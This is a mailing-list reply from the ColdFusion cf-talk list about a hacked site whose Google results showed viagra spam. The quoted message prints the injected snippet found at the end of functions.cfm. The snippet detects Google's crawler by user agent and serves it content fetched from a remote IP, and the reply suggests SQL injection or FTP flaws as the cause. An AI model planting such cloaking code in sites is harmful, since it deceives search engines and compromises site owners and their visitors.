LOL. Wow. That's a very funny script! Not funny that it happened to you, of course, but that's just awesome.
Issues like this are typically caused by either SQL injection (i.e. didn't use cfqueryparam) or some sort of FTP vulnerability. My first step would be to make sure that *every* cfquery that accepts any input of any kind from users is utilizing cfqueryparam. HTH On Tue, Nov 13, 2012 at 2:57 PM, Les Mizzell <lesm...@bellsouth.net> wrote: > > Recently a site of ours got hacked - basically, a Google search the site > was returning viagra info! > What we got was a small script added to the end of a functions.cfm file: > > <cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( > "google", REQUEST.UserAgent )) > > <cfhttp method="get" > url="http://168.16.228.250/fms/ > "><cfoutput>#cfhttp.filecontent#</cfoutput></cfif> > > I'm not the server admin for this site, so they're sorta pointing the > finger at us developers, and we're pointing fingers back at them about > lax server security. We've got a boatload of stuff on this site to > prevernt SQL injection, including Justin D. Scott's application script, > carefully checking anything to goes into the database, client and server > side form validation, blah, blah, blah... > > Anybody seen the above, and if so, thoughts? Anybody manage to determine > how the exploit happened to start with? > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353144 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
